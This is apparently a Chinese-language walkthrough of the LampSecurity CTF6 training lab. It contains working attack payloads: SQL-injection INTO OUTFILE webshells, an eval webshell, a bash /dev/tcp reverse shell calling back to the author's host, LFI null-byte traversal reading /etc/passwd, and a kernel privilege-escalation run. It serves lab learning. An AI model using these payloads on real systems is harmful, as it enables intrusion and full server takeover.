2009-06-29 16:06:03	172.16.61.132 called pymembs=admin
2009-06-29 16:06:03	172.16.61.132 called SqlQuery=test%20
2009-06-29 16:06:03	172.16.61.132 called tampon=test%20
2009-06-29 16:06:03	172.16.61.132 called topic=&amp;lt;script&amp;gt;alert(document.cookie)&amp;lt;/script&amp;gt;%20
2009-06-29 16:06:04	172.16.61.132 called 
2009-06-29 16:06:04	172.16.61.132 called 
2009-06-29 16:06:04	172.16.61.132 called 
2009-06-29 16:06:04	172.16.61.132 called pattern=/etc/*&sort=name
2009-06-29 16:06:05	172.16.61.132 called D=A
2009-06-29 16:06:05	172.16.61.132 called N=D
2009-06-29 16:06:05	172.16.61.132 called S=A
2009-06-29 16:06:05	172.16.61.132 called M=A
2009-06-29 16:06:05	172.16.61.132 called \"><script>alert('Vulnerable');</script>
2009-06-29 16:06:55	172.16.61.132 called 
2009-06-29 16:06:30	172.16.61.132 called 
2009-06-29 16:06:31	172.16.61.132 called 
2009-06-29 16:06:31	172.16.61.132 called action=login
2009-06-29 16:06:31	172.16.61.132 called id=4
2009-06-29 16:06:31	172.16.61.132 called id=3
2009-06-29 16:06:31	172.16.61.132 called id=2
2009-06-29 16:06:31	172.16.61.132 called id=1
2009-06-29 16:06:32	172.16.61.132 called C=N;O=D
2009-06-29 16:06:32	172.16.61.132 called C=M;O=A
2009-06-29 16:06:32	172.16.61.132 called C=S;O=A
2009-06-29 16:06:32	172.16.61.132 called C=D;O=A
2009-06-29 16:06:32	172.16.61.132 called 
2009-06-29 16:06:33	172.16.61.132 called id=4
2009-06-29 16:06:33	172.16.61.132 called action=login
2009-06-29 16:06:33	172.16.61.132 called id=3
2009-06-29 16:06:33	172.16.61.132 called id=2
2009-06-29 16:06:34	172.16.61.132 called id=1
2009-06-29 16:06:34	172.16.61.132 called action=login
2009-06-29 16:06:34	172.16.61.132 called 
2009-06-29 16:06:34	172.16.61.132 called action=login
2009-06-29 16:06:17	172.16.61.132 called 
2009-06-29 16:06:17	172.16.61.132 called 
2009-06-29 16:06:23	172.16.61.132 called Open
2009-06-29 16:06:23	172.16.61.132 called OpenServer
2009-06-29 18:06:56	172.16.61.132 called 

看了一下日志，我们可以明显的发现这台机子显然被攻击过。仔细看看甚至里面已经有攻击者留下的后门了。

2009-06-28 18:06:06	172.16.61.132 called id=4%20UNION%20select%20NULL,NULL,NULL,NULL,NULL,NULL,%27%3C?php%20echo%20system($_POST[\%27cmd\%27]);?%3E%27%20INTO%20OUTFILE%20%27/tmp/008st7845.php%27

但是他放在/tmp目录下，这该怎么访问到。。。
除非有本地文件包含漏洞。我们再仔细看看日志，果然看到上一个攻击者确实在尝试LFI漏洞。

Exploit

我们挑几个的试试看看有没有成功的。

2009-06-28 18:06:13	172.16.61.132 called actions/login.php?action=../conf/config.ini%00

这一条不就是之前在主页登录那块的请求吗。再一想，我们甚至还有index.php的源代码在之前的备份包里。

<?php 
  /**
* This is the index page for the sample application. 
* This application is meant to be part of the PHP Code Auditing 
* course offered by SAS Information Security.  Don *not* install
* this application on a live server
* 
* @package PHP Code Auditing 
* @author Justin C. Klein Keane <jukeane@sas.upenn.edu>
* 
**/

  //make sure the app will run!
  include_once('inc/config_check.php');

session_start();

$logged_in = isset($_COOKIE['logged_in']) ? $_COOKIE['logged_in'] : 0;

//get configuration variables
$configs = parse_ini_file('conf/config.ini') or die("Error parsing config file conf/config.ini");

//set up loggin
include_once('lib/log.class.php');
$log = new Log();

//set up the db connection
$conn = mysql_connect($configs['database_host'], $configs['database_user'], $configs['database_pass']) or $log->append(mysqlerror());
mysql_select_db($configs['database_db']);

$action = (isset($_GET['action'])) ? $_GET['action'] : 'default';
$valid_actions = array(
  'default', 
  'login', 
  'add_event', 
  'edit_event', 
  'view_event', 
  'delete_event', 
  'logout',
  'users',
  'logs');

//auth check
$is_admin = 0;
if (isset($_COOKIE['user_id']) && isset($_COOKIE['hash'])) {
  $sql = 'SELECT user_id 
FROM user 
WHERE 
user_id = ' . $_COOKIE['user_id'] . ' 
AND user_password = \'' . $_COOKIE['hash'] . '\'';
  $retval = mysql_query($sql) or $log->append("Problem with sql $sql <hr/>" . mysql_error());
  if (mysql_num_rows($retval) > 0 )  $is_admin = 1;
}
$admin_actions = array('add_event', 'edit_event', 'view_event', 'delete_event', 'users', 'logs');
if (in_array($action, $admin_actions) && ! $is_admin) $action = 'default';

if (! in_array($action, $valid_actions)) $action = 'default';

if ($action != 'delete_event' && $action != 'logout') 
  include_once('inc/header.php');

include_once('actions/'.$action . '.php');
include_once('inc/footer.php');
?>

第31和62行我们可以看到，典型的LFI漏洞，但是最后有个后缀名.php。看了下PHP版本，刚好可以通过零字符截断。
于是我们验证一下能不能成功

┌──(kali㉿kali)-[~/vulnhub/LampSecurity/ctf6/workSpace]
└─$ curl 'http://192.168.56.140/actions/login.php?action=../../../../../../../../etc/passwd%00'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
avahi:x:70:70:Avahi daemon:/:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
squid:x:23:23::/var/spool/squid:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
pcap:x:77:77::/var/arpwatch:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
dovecot:x:97:97:dovecot:/usr/libexec/dovecot:/sbin/nologin
john:x:500:500::/home/john:/bin/bash
linda:x:501:501::/home/linda:/bin/bash
fred:x:502:502::/home/fred:/bin/bash
molly:x:503:503::/home/molly:/bin/bash
toby:x:504:504::/home/toby:/bin/bash

发现，非常的OK。

所以，按道理，我们和同行一样构造id=4%20UNION%20select%20NULL,NULL,NULL,NULL,NULL,NULL,%27%3C?php%20echo%20system($_POST[\%27cmd\%27]);?%3E%27%20INTO%20OUTFILE%20%27/tmp/008st7845.php%27这样一条语句就可以注入一句话木马然后通过蚁剑连接了。
但是，既然都拿到phpmyadmin的管理员权限的账号了，我们不妨研究下怎么通过phpmyadmin向服务器插入webshell。
上网查了查，主要三种方法能导出webshell：

1. 日志法写入

   • Root数据库用户（root权限）
   • 没有写入权限
   • magic_quotes_gpc：Off（关闭）

show global variables like "%genera%";          //查询general_log配置以及log保存位置
set global general_log='on';              //开启general log模式
SET global general_log_file='D:/phpStudy/WWW/cmd.php';    //设置日志文件保存路径
SELECT '<?php phpinfo();?>';              //phpinfo()写入日志文件，exp写入reverse shell即可。
set global general_log='off';              //关闭general_log模式
// 访问设置的日志文件保存路径可以看到php被执行

2. 直接插入

   • Root数据库用户（root权限）
   • 网站绝对路径（确定有写入权限）
   • magic_quotes_gpc：Off（关闭）

select '<?php exec("/bin/bash -c \'bash -i >& /dev/tcp/<ip>/<port> 0>&1\'")?>' INTO OUTFILE '/tmp/shell.php';

3. 新建数据库插入

   1.Root数据库用户（root权限）
   2.网站绝对路径（确定有写入权限）
   3.magic_quotes_gpc：Off（开启）

/*创建数据表导出shell*/
CREATE TABLE `mysql`.`user1` (`content` TEXT NOT NULL );
INSERT INTO `mysql`.`user1` (`content` ) VALUES ('<?php @eval($_POST[x123]);?>');
SELECT `content` FROM `user1` INTO OUTFILE 'C:\\phpStudy\\WWW\\xxx.php';
DROP TABLE IF EXISTS `user1`;

这台服务器上，general_log功能根本没有，直接第一条skip。
第二条试试。发现写入不到网页的各个目录，难怪前一个攻击者是写入/tmp目录下，看了下mysql的tmpdir，果然是/tmp，这玩意是只读的，只能在配置文件里改。我们只能捏着鼻子写进/tmp目录下了。

select '<?php exec("/bin/bash -c \'bash -i >& /dev/tcp/192.168.56.132/4444 0>&1\'")?>' INTO OUTFILE '/tmp/shell.php';

然而我们组合技还有一个文件包含，我们直接通过LFI漏洞目录遍历请求我们的shell。

# curl 192.168.56.140/actions/login.php?action=../../../../../../../../tmp/shell.php%00  

┌──(kali㉿kali)-[~]
└─$ sudo nc -lvp 4444
[sudo] password for kali: 
listening on [any] 4444 ...
192.168.56.140: inverse host lookup failed: Host name lookup failure
connect to [192.168.56.132] from (UNKNOWN) [192.168.56.140] 39860
bash: no job control in this shell
bash-3.2$ whoami    
apache
bash-3.2$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:5c:75:70 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.140/24 brd 192.168.56.255 scope global eth0
    inet6 fe80::20c:29ff:fe5c:7570/64 scope link 
       valid_lft forever preferred_lft forever
3: sit0: <NOARP> mtu 1480 qdisc noop 
    link/sit 0.0.0.0 brd 0.0.0.0

成功拿到shell。

Privilge Escalation

上来sudo -l，find / -type f -perm -04000 -ls 2>/dev/null,crontab都试过了。看了半天也没啥能用的。手动遍历下目录，/home下各用户home目录全是不可读写，想找点凭证没法了。再手动查看了下还是没啥有用的。
上linpeas，上来就标红了一条内核版本。但是不是很想走内核提权。先试试别的路径。
弄了半天，基本都试过一遍了，没辙了。回头看看内核提权吧。

sh-3.2$ uname -a
Linux localhost.localdomain 2.6.18-92.el5 #1 SMP Tue Jun 10 18:49:47 EDT 2008 i686 i686 i386 GNU/Linux

在exp-db上搜了下Linux Kernal 2.6，从头开始试LPE的exp，试了快8个，都没成功，折磨疯了。
上网搜了一下发现Linux 2.6是有一个著名的内核提权漏洞UDEV。
按他给的步骤先查看udev的pid，然后按网上给的方法先修补一下程序。结果执行多次仍然无法成功提权。

bash-3.2$ cat /proc/net/netlink
sk       Eth Pid    Groups   Rmem     Wmem     Dump     Locks
cfebce00 0   0      00000000 0        0        00000000 2
cfc35a00 6   0      00000000 0        0        00000000 2
cfe78600 7   0      00000000 0        0        00000000 2
c1322200 9   2452   00000000 0        0        00000000 2
cfe66e00 9   0      00000000 0        0        00000000 2
cf557c00 10  0      00000000 0        0        00000000 2
cf518c00 11  0      00000000 0        0        00000000 2
cfc35400 15  568    ffffffff 0        0        00000000 2
cfebcc00 15  0      00000000 0        0        00000000 2
cf518a00 16  0      00000000 0        0        00000000 2
cf6c0c00 18  0      00000000 0        0        00000000 2
bash-3.2$ sed -i -e 's/\r$//' kernal2.6.sh
bash-3.2$ chmod +x kernal2.6.sh
bash-3.2$ ./kernal2.6.sh 568
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file

重试一下，切成sh试试，不知道有没有影响。

sh-3.2$ ./exp.sh 568
./exp.sh 568
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
sh-3.2$ ./exp.sh 568
./exp.sh 568
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
sh-3.2$ ./exp.sh 568
./exp.sh 568
suid.c: In function 'main':
suid.c:3: warning: incompatible implicit declaration of built-in function 'execl'
cp: `libno_ex.so.1.0' and `/tmp/libno_ex.so.1.0' are the same file
sh-3.2# whoami
whoami
root
sh-3.2# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue 
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:5c:75:70 brd ff:ff:ff:ff:ff:ff
    inet 192.168.56.140/24 brd 192.168.56.255 scope global eth0
    inet6 fe80::20c:29ff:fe5c:7570/64 scope link 
       valid_lft forever preferred_lft forever
3: sit0: <NOARP> mtu 1480 qdisc noop 
    link/sit 0.0.0.0 brd 0.0.0.0
sh-3.2#

多试了几次之后成功提权了。
我的评价是内核提权是这样的，非常不稳定。主要这台靶机没有啥别的提权思路了，只能内核提权尝试了。